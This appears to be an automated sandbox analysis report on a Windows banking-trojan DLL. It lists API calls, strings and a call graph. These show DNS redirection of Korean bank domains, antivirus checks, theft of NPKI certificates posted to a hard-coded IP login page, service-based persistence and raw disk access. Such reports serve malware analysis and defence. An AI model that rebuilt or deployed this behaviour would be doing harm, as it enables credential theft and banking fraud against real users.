6723 10007059 CreateThread 6721->6723 6722->6350 6723->6722 6777 10006e10 6723->6777 6724->6714 6726 10010fa0 6725->6726 6727 10006a2a strchr 6726->6727 6728 10006b53 wsprintfA wsprintfA CreateDirectoryA 6727->6728 6729 10006a89 6727->6729 6731 100057f0 CreateFileA WriteFile CloseHandle 6728->6731 6730 10006a92 strchr 6729->6730 6730->6728 6730->6730 6731->6718 6733 10010fa0 6732->6733 6734 1000625f CoInitializeEx CoInitializeSecurity CoCreateInstance 6D262DD0 6733->6734 6735 100062d3 SysAllocString 6734->6735 6736 100062fb 6734->6736 6735->6736 6737 100062ed 6735->6737 6738 10011465 _CxxThrowException 6736->6738 6740 1000631c 6736->6740 6737->6736 6739 10011465 _CxxThrowException 6737->6739 6738->6740 6739->6736 6741 10006359 CoSetProxyBlanket wcscat 6D262DD0 6740->6741 6742 10006830 2 API calls 6740->6742 6743 100063f1 6741->6743 6744 100063c8 SysAllocString 6741->6744 6742->6741 6746 10006412 6D262DD0 6743->6746 6747 10011465 _CxxThrowException 6743->6747 6744->6743 6745 100063df 6744->6745 6745->6743 6748 10011465 _CxxThrowException 6745->6748 6750 10006472 6746->6750 6751 10006449 6746->6751 6747->6746 6748->6743 6754 10011465 _CxxThrowException 6750->6754 6756 10006490 6750->6756 6752 10011320 6 API calls 6751->6752 6753 10006459 6752->6753 6753->6750 6755 10011465 _CxxThrowException 6753->6755 6754->6756 6755->6750 6757 100064c5 6756->6757 6758 10006830 2 API calls 6756->6758 6759 10006830 2 API calls 6757->6759 6776 100064db 6757->6776 6758->6757 6759->6776 6760 100067c7 VariantClear VariantClear 6761 100067e5 CoUninitialize 6760->6761 6761->6720 6762 10006507 VariantInit VariantInit VariantInit 6762->6776 6764 10006575 6D262DD0 6765 100065b3 SysAllocString 6764->6765 6764->6776 6765->6776 6766 10011395 6 API calls 6766->6776 6767 10006664 InterlockedDecrement 6768 1000667b _strcmpi 6767->6768 6767->6776 6769 10006696 6D262DD0 6768->6769 6768->6776 6770 100066d1 SysAllocString 6769->6770 6769->6776 6770->6776 6771 10006880 SysFreeString 6771->6768 6772 10011465 _CxxThrowException 6772->6776 6773 10006785 InterlockedDecrement 6774 1000679c StrStrIA 6773->6774 6773->6776 6774->6776 6775 10006880 SysFreeString 6775->6774 6776->6760 6776->6762 6776->6764 6776->6766 6776->6767 6776->6768 6776->6771 6776->6772 6776->6773 6776->6774 6776->6775 6778 10006e42 6D262DD0 6777->6778 6779 10006e3e 6777->6779 6783 10006e55 6778->6783 6779->6778 6780 10006f11 6782 10006f17 CloseHandle 6780->6782 6781 10006e5f VirtualQueryEx 6781->6780 6781->6783 6783->6780 6783->6781 6784 10006eb4 ReadProcessMemory 6783->6784 6785 10006ea3 6D262DD0 6783->6785 6787 10006b60 6783->6787 6784->6783 6785->6784 6788 10006b6a 6787->6788 6789 10006bca wsprintfA 6788->6789 6790 10006db3 6788->6790 6791 10006a20 2 API calls 6789->6791 6790->6783 6792 10006c1c wsprintfA wsprintfA CreateDirectoryA 6791->6792 6795 100057f0 CreateFileA WriteFile CloseHandle 6792->6795 6794 10006ca7 14 API calls 6794->6788 6795->6794 6796->6367 6813 100050e0 InternetOpenA 6797->6813 6799 100080cb 6800 100080d2 6799->6800 6814 10005100 InternetOpenUrlA 6799->6814 6800->6369 6802 10008104 6802->6369 6803 100080fa 6803->6802 6806 10008148 6803->6806 6805 10008199 6 API calls 6805->6806 6806->6805 6807 10008237 6806->6807 6815 10005130 InternetReadFile 6806->6815 6808 10008323 wsprintfA 6807->6808 6811 100082b1 6807->6811 6809 10008344 6808->6809 6810 10008376 strrchr 6809->6810 6812 10008386 6810->6812 6811->6369 6812->6369 6813->6799 6814->6803 6815->6806 6816->6377 6840 10007e20 6817->6840 6819 100091fc 6855 100073c0 setsockopt 6819->6855 6823 10009213 6824 10009227 send 6823->6824 6825 10009245 closesocket 6824->6825 6834 1000925a 6824->6834 6826 1000942f 6827 10009264 select 6828 10009422 InterlockedExchange 6827->6828 6827->6834 6828->6826 6829 100092af __WSAFDIsSet 6829->6827 6830 100092c1 recv 6829->6830 6830->6828 6830->6834 6831 10009399 InterlockedExchange 6831->6827 6832 100093dc strstr 6832->6834 6835 100093f3 CreateThread 6832->6835 6833 10009359 closesocket 6833->6827 6834->6826 6834->6827 6834->6829 6834->6831 6834->6832 6834->6833 6838 10007940 6 API calls 6834->6838 6839 10005160 ExitWindowsEx 6834->6839 6876 100079f0 6834->6876 6886 10007a80 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 6D262DD0 6834->6886 6835->6827 6946 10008bf0 6835->6946 6838->6834 6839->6834 6841 10007fa6 WSAStartup htons 6840->6841 6842 10007eb8 strstr 6840->6842 6888 10007090 inet_addr inet_addr 6841->6888 6843 10007eda 6842->6843 6846 10007f2d 6842->6846 6892 10007bf0 6843->6892 6849 10007f55 strstr 6846->6849 6848 10007ee7 strstr 6848->6846 6852 10007ef8 strcspn strstr 6848->6852 6849->6841 6853 10007f68 strcspn strncpy strcspn atoi 6849->6853 6850 10008005 closesocket 6850->6819 6851 1000801a 6851->6819 6852->6849 6854 10007f13 strcspn strncpy 6852->6854 6853->6841 6854->6849 6856 100073e1 WSAIoctl 6855->6856 6857 10007415 6855->6857 6856->6857 6858 10007750 RegOpenKeyExA 6857->6858 6859 100077c6 6858->6859 6860 10007789 6858->6860 6913 10007100 6859->6913 6911 10005360 RegQueryValueExA 6860->6911 6863 100077bc 6912 10005350 RegCloseKey 6863->6912 6866 10007420 2 API calls 6867 10007829 GlobalMemoryStatusEx 6866->6867 6868 10007851 6867->6868 6869 100050c0 wvsprintfA 6868->6869 6870 10007867 GetSystemDefaultUILanguage 6869->6870 6919 10007670 6870->6919 6872 100078da 6873 100078e1 6872->6873 6874 100050c0 wvsprintfA 6872->6874 6873->6823 6875 1000792b 6874->6875 6875->6823 6877 100050c0 wvsprintfA 6876->6877 6878 10007a0b 6877->6878 6943 10005290 CreateFileA 6878->6943 6880 10007a2f 6881 10007a39 6880->6881 6944 100051d0 WriteFile 6880->6944 6881->6834 6883 10007a66 6945 100051c0 CloseHandle 6883->6945 6885 10007a6c 6885->6834 6887 10007b1b 6886->6887 6887->6834 6889 100070a6 6888->6889 6891 100070ac socket connect 6888->6891 6905 10005050 gethostbyname 6889->6905 6891->6850 6891->6851 6893 10007bfa 6892->6893 6906 100050e0 InternetOpenA 6893->6906 6895 10007c23 6896 10007c91 6895->6896 6907 10005100 InternetOpenUrlA 6895->6907 6896->6848 6898 10007c46 6899 10007c77 6898->6899 6908 10005130 InternetReadFile 6898->6908 6910 10005150 InternetCloseHandle 6899->6910 6902 10007c80 6902->6848 6903 10007c71 6909 10005150 InternetCloseHandle 6903->6909 6905->6891 6906->6895 6907->6898 6908->6903 6909->6899 6910->6902 6911->6863 6912->6859 6914 100071c4 6913->6914 6915 10007117 6913->6915 6914->6866 6915->6914 6916 1000712b GlobalAlloc 6915->6916 6917 10007173 6916->6917 6918 100071bb GlobalFree 6916->6918 6917->6917 6917->6918 6918->6914 6920 100050c0 wvsprintfA 6919->6920 6921 100076a1 6920->6921 6937 10005180 PathFileExistsA 6921->6937 6923 100076ab 6924 100076b2 6923->6924 6938 10005290 CreateFileA 6923->6938 6924->6872 6926 100076df 6927 100076e9 6926->6927 6939 100052c0 ReadFile 6926->6939 6927->6872 6929 10007711 6940 100051c0 CloseHandle 6929->6940 6931 10007717 6941 10005190 StrStrIA 6931->6941 6933 10007722 6934 10007729 6933->6934 6942 10005190 StrStrIA 6933->6942 6934->6872 6936 1000773d 6936->6872 6937->6923 6938->6926 6939->6929 6940->6931 6941->6933 6942->6936 6943->6880 6944->6883 6945->6885 6947 10005620 5 API calls 6946->6947 6948 10008c04 6947->6948 6981 10008b90 6948->6981 6950 10008c0c 6951 10008c11 6950->6951 6952 10008c1c 6D262DD0 6950->6952 6953 10007ca0 8 API calls 6952->6953 6955 10008c46 6953->6955 6954 10007420 2 API calls 6956 10008ca9 GetTickCount srand 6954->6956 6955->6954 6979 100091a6 6955->6979 6958 10008d3a rand 6956->6958 6959 10008d43 6958->6959 6959->6958 6960 10008d56 wsprintfA CreateDirectoryA rand 6959->6960 6961 10008db4 rand 6960->6961 6962 10008daf 6960->6962 6963 10008dc3 6961->6963 6964 10008dc8 rand 6961->6964 6962->6961 6963->6964 6965 10008dd7 6964->6965 6966 10008ddc rand 6964->6966 6965->6966 6967 10008df0 rand 6966->6967 6968 10008deb 6966->6968 6969 10008e04 wsprintfA wsprintfA 6967->6969 6970 10008dff 6967->6970 6968->6967 6988 10008660 6969->6988 6970->6969 6972 10008e45 6999 10008480 CreateFileA WriteFile CloseHandle 6972->6999 6974 10008e58 Sleep 6976 10008b90 20 API calls 6974->6976 6977 10008e78 6976->6977 6978 10008e80 50 API calls 6977->6978 6977->6979 7000 10008880 OpenSCManagerA 6978->7000 6982 10005620 5 API calls 6981->6982 6983 10008b9e CreateMutexA GetLastError 6982->6983 6984 10008bc0 6983->6984 6985 10008bdc ReleaseMutex CloseHandle 6984->6985 6986 10005460 11 API calls 6984->6986 6985->6950 6987 10008bd4 6986->6987 6987->6985 6989 10001000 3 API calls 6988->6989 6990 1000869a RegOpenKeyA 6989->6990 6991 100086d5 _CxxThrowException 6990->6991 6992 100086ea RegQueryValueExA 6990->6992 6991->6992 6993 10008728 StrStrIA 6992->6993 6994 1000870d _CxxThrowException 6992->6994 6995 1000877e RegCloseKey 6993->6995 6996 1000873e lstrlen 6993->6996 6994->6972 6995->6972 7022 100084d0 6996->7022 6999->6974 7001 10008933 7000->7001 7002 10008944 CreateServiceA 7000->7002 7001->6979 7003 10008970 GetLastError 7002->7003 7004 100089aa 6 API calls 7002->7004 7003->7004 7005 1000897d OpenServiceA 7003->7005 7006 10008a32 _CxxThrowException 7004->7006 7007 10008a47 RegSetValueExA SetLastError 7004->7007 7010 1000898e 7005->7010 7011 1000899f StartServiceA 7005->7011 7006->7007 7008 10008a76 _CxxThrowException 7007->7008 7009 10008a8b RegCloseKey RegOpenKeyExA 7007->7009 7008->7009 7012 10008b00 RegSetValueExA SetLastError 7009->7012 7013 10008aeb _CxxThrowException 7009->7013 7010->6979 7011->7004 7014 10008b55 RegCloseKey 7012->7014 7015 10008b28 _CxxThrowException 7012->7015 7013->7012 7038 100087a0 OpenSCManagerA 7014->7038 7016 10008b44 7015->7016 7017 10008b4f 7015->7017 7016->7017 7019 10008b49 GetLastError 7016->7019 7017->6979 7019->7017 7020 10008b65 RegCloseKey 7020->6979 7023 10008507 7022->7023 7033 1000858b 7022->7033 7024 10008535 RegOpenKeyExA 7023->7024 7025 100085b6 RegOpenKeyExA 7023->7025 7026 100085e6 RegOpenKeyExA 7023->7026 7027 1000850e RegCreateKeyExA 7023->7027 7031 10008555 7024->7031 7024->7033 7032 100085d2 RegDeleteKeyA 7025->7032 7025->7033 7029 10008602 RegDeleteValueA 7026->7029 7026->7033 7027->7024 7027->7033 7029->7033 7030 10008627 7030->6995 7031->7033 7034 10008590 RegSetValueExA 7031->7034 7035 10008565 7031->7035 7032->7033 7037 1000863b RegCloseKey RegCloseKey 7033->7037 7034->7033 7035->7033 7036 1000856e RegSetValueExA 7035->7036 7036->7033 7037->7030 7039 10008874 7038->7039 7040 100087bf OpenServiceA 7038->7040 7039->7020 7041 10008861 CloseServiceHandle 7040->7041 7042 100087da ChangeServiceConfigA StartServiceA 7040->7042 7041->7020 7043 10008804 GetLastError 7042->7043 7044 10008829 QueryServiceStatus 7042->7044 7043->7044 7045 10008811 CloseServiceHandle CloseServiceHandle 7043->7045 7046 10008859 CloseServiceHandle 7044->7046 7047 1000883c 7044->7047 7045->7020 7046->7041 7047->7046 7048 10008849 Sleep QueryServiceStatus 7047->7048 7048->7046 7048->7047 7049->6382 7052 10009abd 7056 100213a2 7052->7056 7054 10009ad0 6D262DD0 7055 10029fd0 7054->7055 7055->7055 7057 100213a7 7056->7057

                                      Executed Functions

                                      Function 10005E10 Relevance: 72.0, APIs: 32, Strings: 9, Instructions: 263networksleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 10005E82
                                      • socket.WS2_32(00000002,00000002,00000000), ref: 10005E94
                                      • socket.WS2_32(00000002,00000002,00000000), ref: 10005EA0
                                      • htons.WS2_32(00000035), ref: 10005EB7
                                      • inet_addr.WS2_32(127.0.0.1), ref: 10005EC9
                                      • htons.WS2_32(00000035), ref: 10005ED1
                                      • inet_addr.WS2_32(?), ref: 10005ED8
                                      • bind.WS2_32(00000000,?,00000010), ref: 10005EE2
                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 10005EFB
                                      • select.WS2_32 ref: 10005F3C
                                      • WSAGetLastError.WS2_32 ref: 10005F46
                                      • Sleep.KERNEL32(000003E8), ref: 10005F51
                                      • recvfrom.WS2_32(00000000,?,00000200,00000000,00000000,?), ref: 10005F8B
                                      • wsprintfA.USER32 ref: 10005FF2
                                      • StrStrIA.SHLWAPI(www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c,?), ref: 1000600E
                                      • StrStrIA.SHLWAPI(?,alyac), ref: 1000602A
                                      • StrStrIA.SHLWAPI(?,ahnlab), ref: 1000603A
                                      • StrStrIA.SHLWAPI(?,v3lite), ref: 1000604A
                                      • malloc.MSVCRT ref: 1000605A
                                      • htons.WS2_32(00008180), ref: 10006091
                                      • htons.WS2_32(00008182), ref: 100060A8
                                      • htons.WS2_32(00000001), ref: 100060B4
                                      • htons.WS2_32(0000C00C), ref: 100060DA
                                      • htons.WS2_32(00000001), ref: 100060E3
                                      • htons.WS2_32(00000001), ref: 100060EC
                                      • htonl.WS2_32(0000007B), ref: 100060F5
                                      • htons.WS2_32(00000004), ref: 10006101
                                      • inet_addr.WS2_32(127.0.0.1), ref: 1000611C
                                      • sendto.WS2_32(?,?,00000010,00000000,?,00000010), ref: 1000615B
                                      • closesocket.WS2_32(?), ref: 10006194
                                      • closesocket.WS2_32(00000000), ref: 10006197
                                      • WSACleanup.WS2_32 ref: 10006199
                                      Strings
                                      • ahnlab, xrefs: 10006034
                                      • 127.0.0.1, xrefs: 10005EBF, 10006117
                                      • %s|, xrefs: 10005FEB
                                      • iRecv=0, xrefs: 10006177
                                      • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 10006009
                                      • 8.8.8.8, xrefs: 10005E5D
                                      • v3lite, xrefs: 10006044
                                      • alyac, xrefs: 10006024
                                      • c:\3.txt, xrefs: 1000617C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: htons$inet_addr$closesocketsocket$CleanupErrorLastSleepStartupbindhtonlioctlsocketmallocrecvfromselectsendtowsprintf
                                      • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$c:\3.txt$iRecv=0$v3lite$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
                                      • API String ID: 3913902103-3128632860
                                      • Opcode ID: b85d70ee679bfbae6654c32a675e835e059487f67f27821f8a9bdb85a842703e
                                      • Instruction ID: 6a78d858e6a5a08b9cde055bca40f9f9f98f5805156c37e08f8545c097103a96
                                      • Opcode Fuzzy Hash: b85d70ee679bfbae6654c32a675e835e059487f67f27821f8a9bdb85a842703e
                                      • Instruction Fuzzy Hash: 8AA1BC71608345AFE720DB60CC85BAFB7E9EF88744F00491DF68597290DBB4EA08CB56
                                      Function 1000B3C0 Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 237stringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrcpy.KERNEL32(00000000,?), ref: 1000B3F4
                                      • lstrcat.KERNEL32(00000000,10019C10), ref: 1000B40D
                                      • lstrcat.KERNEL32(00000000,*.*), ref: 1000B41C
                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 1000B42E
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 1000B454
                                      • lstrcpy.KERNEL32(00000000,?), ref: 1000B4AA
                                      • lstrcat.KERNEL32(00000000,10019C10), ref: 1000B4BD
                                      • lstrcat.KERNEL32(00000000,0000002E), ref: 1000B4CF
                                      • _strcmpi.MSVCRT ref: 1000B4DE
                                      • PathIsDirectoryA.SHLWAPI(?), ref: 1000B531
                                      • 6D262DD0.MFC42(00A00000,?,?,?,?,00000000), ref: 1000B544
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileFindlstrcpy$D262DirectoryFirstNextPath_strcmpi
                                      • String ID: %s\%s$*.*$.$/image.php$107.163.241.186:12354/login.php$11121541$NPKI
                                      • API String ID: 3598801687-675274852
                                      • Opcode ID: 819a45a9d1b067640268757ad9253d2cf9f23331dbc3ac5890bd5eee83ea9760
                                      • Instruction ID: 7599fc823e929f38516ac2ea80dcb634581b4eaf94ee74f111db2df8a507a940
                                      • Opcode Fuzzy Hash: 819a45a9d1b067640268757ad9253d2cf9f23331dbc3ac5890bd5eee83ea9760
                                      • Instruction Fuzzy Hash: 6381E771604785AFE324CB24CC45BEB77E9EBC8344F004D2DE68993291EB75A648C792
                                      Function 10005870 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNEL32 ref: 1000588A
                                      • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 1000589A
                                      • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100058B1
                                      • malloc.MSVCRT ref: 100058CA
                                      • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,1000BBE4,00000035), ref: 100058F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExtendedTable$AddressLibraryLoadProcmalloc
                                      • String ID: GetExtendedUdpTable$iphlpapi.dll
                                      • API String ID: 2385667234-1809394930
                                      • Opcode ID: e1b00724cfaacc8b843fa86b310e38769440c808da8af4b399ce40dbed45f0c6
                                      • Instruction ID: d7c0e26cda9d5ea5ce5ff2f3001dfa376abaab0d7e51cba96a5469bc1a5c6616
                                      • Opcode Fuzzy Hash: e1b00724cfaacc8b843fa86b310e38769440c808da8af4b399ce40dbed45f0c6
                                      • Instruction Fuzzy Hash: CB21E171204302ABF710DF28EC85BAB37E4EF847A0F008A25F995D62C0D772D949C7A2
                                      Function 1000C190 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145filewindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • sprintf.MSVCRT ref: 1000C1A9
                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000C1C6
                                      • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 1000C1F8
                                      • GetLastError.KERNEL32(00000400,?,00000000,00000000), ref: 1000C20C
                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 1000C21A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ControlCreateDeviceErrorFileFormatLastMessagesprintf
                                      • String ID: \\.\PHYSICALDRIVE%d
                                      • API String ID: 1111953355-613073274
                                      • Opcode ID: c53000877ec2aa7fee595b4572a85b816ff392d08c2107d39e209743fa20e477
                                      • Instruction ID: 45ae0edda3d41c4c2eec03a22dee8fc668454583b3e0103b580059d381486647
                                      • Opcode Fuzzy Hash: c53000877ec2aa7fee595b4572a85b816ff392d08c2107d39e209743fa20e477
                                      • Instruction Fuzzy Hash: 3D4127762443046BF324DA38DC46FEB7385EB98760F508729FA55CB2C0EEB59A188395
                                      Function 10005620 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 1000562A
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 10005631
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10005647
                                      • AdjustTokenPrivileges.KERNELBASE ref: 1000568A
                                      • CloseHandle.KERNEL32 ref: 10005695
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                      • String ID:
                                      • API String ID: 3038321057-0
                                      • Opcode ID: e3783ca1f29b139df8556e5866564b38593cf1fe3dbbde3397e265e7e817bc56
                                      • Instruction ID: a2edfa9b86e6a0acb4b0852c084eebde7c3743d30616468f98f68bef03f890e1
                                      • Opcode Fuzzy Hash: e3783ca1f29b139df8556e5866564b38593cf1fe3dbbde3397e265e7e817bc56
                                      • Instruction Fuzzy Hash: 7B0129B4608301ABE704DF64CD85B6B77E8FBC8B41F80CA1CF94986291DB75D904CB62
                                      Function 1000C0C0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,1000C265,00000000), ref: 1000C110
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ControlDevice
                                      • String ID:
                                      • API String ID: 2352790924-0
                                      • Opcode ID: 6efe1891206b3777681fb32c89ca79adf49100392fac54556cb4e8c3ccab099b
                                      • Instruction ID: dd68c41c000daad9a29386f739e30e366fb2defe37250152ab40d60b23e964fe
                                      • Opcode Fuzzy Hash: 6efe1891206b3777681fb32c89ca79adf49100392fac54556cb4e8c3ccab099b
                                      • Instruction Fuzzy Hash: 63F0A96228A3C29EE702CB688855BD2FF947B76710F0CD7C9F1D85B283C2548598D766
                                      Function 100051F0 Relevance: 1.5, APIs: 1, Instructions: 6processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(?,?), ref: 100051FA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3332741929-0
                                      • Opcode ID: b1a37351201e7f7fa222f0003396ead25511c011be7531a2d416dfbceb343984
                                      • Instruction ID: b514baa08b3f1d8f82369d583fde96a78a05e9397895c3dcff7847106b415855
                                      • Opcode Fuzzy Hash: b1a37351201e7f7fa222f0003396ead25511c011be7531a2d416dfbceb343984
                                      • Instruction Fuzzy Hash: EDB09275108300ABD304DB10C984C2BB7A9AB94320B008808F48582118C630D880CB21
                                      Function 10001000 Relevance: 61.7, APIs: 3, Strings: 32, Instructions: 403stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 26 10001000-100017ea 27 100017f1-100017f5 26->27 28 100017ec-100017ed 26->28 29 100017f7-100017f8 27->29 30 100017fc-10001832 6D262DD0 27->30 28->27 29->30 31 10001834-10001838 30->31 32 1000186f 30->32 34 1000183a 31->34 33 10001873-10001880 32->33 35 10001882-10001883 33->35 36 100018c7-100018d1 33->36 37 1000183c-10001846 34->37 38 10001885-1000188f 35->38 39 100018ee-10001920 6D262DD0 lstrcpy call 10010f40 35->39 40 100018d3-100018d6 36->40 41 100018d8-100018e1 36->41 42 10001848-10001849 37->42 43 1000184b-1000184e 37->43 48 10001891-10001894 38->48 49 10001896-100018a0 38->49 40->41 45 100018e3-100018e6 41->45 46 100018e8-100018ed 41->46 44 10001850-10001854 42->44 43->44 44->37 50 10001856-1000186b 44->50 45->46 46->39 48->49 52 100018a2-100018a5 49->52 53 100018a7-100018b0 49->53 50->34 54 1000186d 50->54 52->53 55 100018b2-100018b5 53->55 56 100018b7-100018c5 53->56 54->33 55->56 56->39
                                      APIs
